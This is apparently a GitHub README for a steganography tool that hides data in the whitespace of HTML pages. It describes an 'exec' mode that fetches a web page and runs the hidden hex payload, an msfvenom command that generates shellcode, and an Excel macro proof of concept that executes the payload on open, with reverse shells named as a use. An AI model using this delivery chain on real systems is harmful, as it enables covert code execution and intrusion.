Skip to content

HTML-Ninja # inter-word white space steganography tool

License

Notifications You must be signed in to change notification settings

ephreet/html-ninja

Repository files navigation

HTML-NINJA by ephreet

HTML NINJA is a steganograpy tool to encrypt files in white spaces of html documents: the final result is a oneline HTML that, when parsed by browsers, will show only single spaces This will work only if the source page will have enough spaces to contain the data to be hidden! You can also use it on any text container, but the result will be unformatted text with a lot of suspicious spaces...

USAGE EXAMPLES:

html-ninja.py -e source content outfile -> will encode the payload file 'content' into file 'source' and output the result as 'outfile'
html-ninja.py -d source outfile -> will try to decrypt white spaces in 'source' file into 'outfile'
html-ninja.py --check filename -> will check 'filename' for available spaces and spaces needed to embed the file
html-ninja.py -d http://localhost/html-ninja.html stdout -> will get http url and output to stdout
html-ninja.py -d http://localhost/html-ninja.html exec -> will get http url and execute the hex payload (payload must have a '|' terminator)
html-ninja.py -ez / -dz ... -> adds zlib compression to both encryption and decryption
html-ninja.py -eb / -db ... -> adds bz2 compression to both encryption and decryption

html-ninja.js

This is a very basic function to read hidden data directly from browser, there are a lot of ways you can use this...just use your imagination!

html-ninja.html

This is a PoC to show how it's possible to embed self decrypting data inside html pages. This needs a proper web server to run (not file:///...)

buf.txt

This is a sample payload to test the 'exec' parameter while decrypting.

msfvenom -p linux/x64/exec CMD="whoami;id;uname -a" -f python -o buf.txt

macro_poc.bas & htm

These two files are a proof of concept on Microsoft VBA: Excel macro to open and execute payload onload. Needs:

  • Microsoft Scripting Runtime
  • Microsoft Visual Basic for Applications Extensibility

There is a version using msf, no evasion, as proof of concept for implementing msf payloads like reverse shell.

About

HTML-Ninja # inter-word white space steganography tool

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages